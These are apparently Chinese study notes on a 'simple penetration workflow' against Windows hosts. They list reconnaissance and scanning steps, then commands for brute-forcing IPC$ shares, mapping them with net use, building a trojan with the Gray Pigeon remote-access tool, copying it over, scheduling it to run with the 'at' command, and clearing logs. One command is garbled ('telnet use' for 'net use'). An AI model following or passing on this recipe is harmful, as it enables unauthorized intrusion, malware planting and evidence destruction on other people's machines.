一 系统基础----14. 简单渗透流程

a. 授权
b. 信息收集
nslookup whois
c. 扫描漏洞
从高至低， IP -> Port 软件 网站
e. 漏洞利用

d. 提权(Shell环境、桌面环境 最高权限)

---

f. 清除日志

telnet <IP> <port>		# 使用该命令 可以通过回应来测试端口号是否开启
net use <F:> <IP\...> <pwd> /user:<user> # 以user身份登录，将共享盘映射到本机上的 F盘
net use <F:> /del
net use <ipc$> <pwd> /user:<user>

time 	# 查看时间
time \\<ip> # 查看目标电脑的时间

at	# 列出task
at <time> <...>	# 在time这个时间，进行...任务。例如 
	at \\192.168.1.1 11:46 "c:\windows\system32\sds.exe" 即在某个时间执行sds.exe 

简单流程
1. scanport 扫描软件， 扫描开放端口
2. 漏洞利用  IPC$:
	进行暴力破解 NTscan
	实际该软件用的是命令 telnet use <IP> <pwd> /user:<user>	
3. net use f: <IP\IPC$> <pwd> /user:<user>
	将共享IPC$ 映射到本地F:
4. 制作木马
	利用 灰鸽子软件
5. 植入木马
	copy <src> <des>
6. 设置计划任务自动执行木马
	net time <IP>
	at <IP> <time> "<>"		
	# 例如植入软件为 c:/windows/system32/dsc.exe	
	# 在 远程电脑192.168.5.2, 时间是 11:16
	# at \\192.168.5.2 11:16 "c:/windows/system32/dsc.exe"
7.  清除日志